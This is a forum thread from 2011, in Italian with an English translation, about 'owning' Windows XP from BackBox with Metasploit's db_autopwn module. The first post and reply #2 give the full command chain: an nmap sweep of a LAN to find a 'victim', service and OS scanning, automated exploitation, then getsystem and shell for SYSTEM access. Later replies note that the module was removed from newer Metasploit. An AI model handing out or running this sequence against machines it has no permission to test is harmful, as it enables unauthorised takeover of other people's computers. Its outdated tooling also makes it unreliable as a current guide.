Author Topic: Owning Windows XP with Backbox  (Read 9219 times)

C4tl3ash

  • Newbie
  • *
  • Posts: 1
    • View Profile
on: March 24, 2011, 08:09:48 PM
Owning Windows XP with BackBox


Link Video: http://www.youtube.com/watch?v=hZQ8HpF2Pho
guida relativamente semplice , usando il modulo autopwn di metasploit ^^

Tool usati:
  • Metasploit 3 ( incluso in Backbox )
  • NMap ( Incluso in BackBox )
  • Modulo AutoPwn ( incluso in Metasploit 3 )
  • Postgresql ( o un altro db ^^ )

Elenco comandi:
Code: [Select]
sudo /etc/init.d/postgresql-8.4 start
nmap -sP -T4 192.168.1.1-255
sudo msfconsole
db_driver postgresql
db_connect nomeutentepostgres:"password"@localhost/msf
db_nmap -sS -sV -T4 -O 192.168.1.235
db_autopwn -x -e -p -R great
sessions -i 1
getsystem
shell

Note teoriche:
Non credo servano :3

Spiegazione:
 Allora per prima cosa dobbiamo avviare il Database Postgres, con il comando:
 sudo /etc/init.d/postgresql-8.* start
successivamente troviamo l'indirizzo ip della vittima tramite il potente PortScanner NMap,
diamo quindi:
nmap -sP -T4 192.168.1.1-255

    * -sP: Aumenta la velocità, poichè non esegue portscanning ma rileva solamente se l'host è Up  tramite ping :)
    * -T4: Livello di velocità, che varia da -T1 ( Paranoid ) a -T5 ( Insane ), di solito questo valore non varia molto poichè le modalità < -T3 vengono usate principalmente per i sistemi anti intrusione ecc...
    * 1-255: Esegue lo scan su un range di indirizzi che va da 192.168.1.1 a 192.168.1.255


 una volta trovato l'indirizzo che nel mio caso era 192.168.1.235 copiamolo ed apriamo msfconsole,
digitiamo:

db_driver postgresql


successivamente creiamo il nostro database:

db_connect nomeutentepostgres:"password"@localhost/msf

una volta finito eseguiamo il modulo nmap dando:

db_nmap -sS -sV -T4 -O 192.168.1.235

i risultati vengono automaticamente salvati all'interno del db, quindi una volta finito diamo:

db_autopwn -x -e -p -R great

    * -R great: serve per selezionare solo gli exploit che hanno grandi possibilità di riuscire :)

ed non appena finisce, vediamo le sessioni create con

sessions -l

e selezioniamo di interagire con una tramite:

sessions -i ID


c4tl3ash~



trenatos

  • Newbie
  • *
  • Posts: 2
    • View Profile
Reply #1 on: July 15, 2011, 03:08:17 AM
Any chance getting this translated into English? I think more people would have use for it, if it was available in multiple languages.



vincenzo

  • Full Member
  • ***
  • Posts: 103
    • View Profile
Reply #2 on: July 15, 2011, 10:28:25 AM
Link Video: http://www.youtube.com/watch?v=hZQ8HpF2Pho
This is a relatively simple guide based upon the Metasploit Autopwn module.

Tools Involved:
  • Metasploit 3 ( included in Backbox )
  • NMap ( included in BackBox )
  • AutoPwn module ( included in Metasploit 3 )
  • Postgresql ( or another db )

Commands to be Issued:
Code: [Select]
sudo /etc/init.d/postgresql-8.4 start
nmap -sP -T4 192.168.1.1-255
sudo msfconsole
db_driver postgresql
db_connect postgres_username:"password"@localhost/msf
db_nmap -sS -sV -T4 -O 192.168.1.235
db_autopwn -x -e -p -R great
sessions -i 1
getsystem
shell

Theory:
Not needed.

Explanation:
First, you'll need to start the Postgres Database related service by issuing the following command:
Code: [Select]
sudo /etc/init.d/postgresql-8.* start

then, seek a victim target IP through the powerful port-scanning tool NMap:
Code: [Select]
nmap -sP -T4 192.168.1.1-255

  • -sP: increases the scanning speed as it doesn't actually make any port-scanning,
    it just detects whether a host  is up or not, through a simple ping.
  • -T4: speed level, it ranges from -T1 (Paranoid) to -T5 (Insane). This value doesn't vary that much since the values < -T3
    are mainly employed in anti-intrusion systems etc...
  • 1-255: scans IP addresses over the range between 192.168.1.1 and 192.168.1.255

Once you get the IP (192.168.1.235 in my example), copy it and start a msfconsole session. Then, type:
Code: [Select]
db_driver postgresql
Next, create your database:
Code: [Select]
db_connect postgres_username:"password"@localhost/msf

after that, execute the nmap module:
Code: [Select]
db_nmap -sS -sV -T4 -O 192.168.1.235

results will be automatically saved in your db. Then, give the following command:
Code: [Select]
db_autopwn -x -e -p -R great
  • -R great: filters the only exploits with better chances to succeed :)

Check out the created sessions with:
Code: [Select]
sessions -l

Finally, select one of them:
Code: [Select]
sessions -i ID
« Last Edit: July 15, 2011, 01:08:10 PM by vincenzo »

You cannot teach a man anything. You can only help him discover it within himself.




trenatos

  • Newbie
  • *
  • Posts: 2
    • View Profile
Reply #3 on: July 15, 2011, 04:08:32 PM
Thank you Vincenzo!



Vlad

  • Newbie
  • *
  • Posts: 2
    • View Profile
Reply #4 on: November 30, 2011, 11:40:07 PM
Nel tentare questo exploit mi sono inceppato su una cosa che magari per molti è stupida, ma non per me siccome sono alle prime armi :). Mi chiedevo se qualcuno mi potesse dire come mai quando arrivo a dover usare il comando "db_autopwn" mi da il seguente errore:

Code: [Select]
[-] Unknown command: db_autopwn.



While attempting to use this exploit I got stuck with something that many of you would consider as stupid, but not for me because I'm quite a newbie in this field :). I was wondering if any of you could explain me why do I get the following error when I use "db_autopwn":

Code: [Select]
[-] Unknown command: db_autopwn.



raffaele

  • Administrator
  • Hero Member
  • *****
  • Posts: 506
    • View Profile
    • My Blog
Reply #5 on: December 01, 2011, 11:30:07 AM
ciao vlad, sembra che nelle nuove versioni di metasploit "db_autopwn" non sia più supportato...

raffaele@backbox:~$ Get root or die tryin'


SYSTEM_OVERIDE

  • Guest
Reply #6 on: December 01, 2011, 03:31:23 PM
ciao vlad, sembra che nelle nuove versioni di metasploit "db_autopwn" non sia più supportato...

Confermo .



Vlad

  • Newbie
  • *
  • Posts: 2
    • View Profile
Reply #7 on: December 01, 2011, 06:49:02 PM
Ottimo grazie :).



Escalion

  • Newbie
  • *
  • Posts: 1
    • View Profile
Reply #8 on: December 07, 2011, 07:06:39 PM
I found this fork with autopwn still enabled. Maybe it might be an idea to use this fork optionally in backbox?



dravok

  • Jr. Member
  • **
  • Posts: 84
    • View Profile
Reply #9 on: December 11, 2011, 03:13:11 PM
con l attacco database effettua tutte le prove.. ma non fa lo stesso anche Hail Mary?



berghem

  • Jr. Member
  • **
  • Posts: 97
    • View Profile
    • http://lorenzistefano.com
Reply #10 on: December 11, 2011, 07:17:23 PM
Non ho molta esperienza, ma penso che autopwn sia ampiamente sostituito da armitage, ho sbaglio?